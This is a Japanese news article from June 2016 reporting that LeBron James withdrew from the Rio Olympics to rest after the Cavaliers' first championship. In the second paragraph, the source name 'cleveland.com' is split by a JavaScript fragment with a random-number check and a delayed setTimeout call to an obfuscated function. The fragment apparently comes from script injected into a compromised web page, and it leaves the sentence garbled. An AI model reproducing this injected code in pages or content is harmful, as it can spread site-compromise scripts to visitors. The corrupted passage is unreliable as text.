レブロン・ジェームズも五輪出場を辞退

レブロン・ジェームズも五輪出場を辞退

2016/06/25 16:00

写真=Getty Images

念願のキャブズ初優勝を果たしたジェームズは「休養」を選択

キャバリアーズのレブロン・ジェームズが、8月に開催されるリオ五輪に出場しないことが分かった。

以前、『clevelandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.com』に「今夏は休養するかもしれない」とコメントしていたジェームズは、6月23日に代理人のリッチ・ポールを通じてUSAバスケットボール協会に対し、リオ五輪への参加を辞退する意思を伝えた。

ジェームズは、2008年の北京五輪、2012年のロンドン五輪に出場し、チームUSAの金メダル獲得に貢献している。しかし、31歳という年齢に加え、キャリア13年を通してキャブズと代表に全力を注いできただけに、悲願の初優勝を達成して迎える今オフは、体のケアと心の充電を優先することにしたようだ。

クリーブランドに悲願の初優勝をもたらしたレブロン・ジェームズ。

RECOMMEND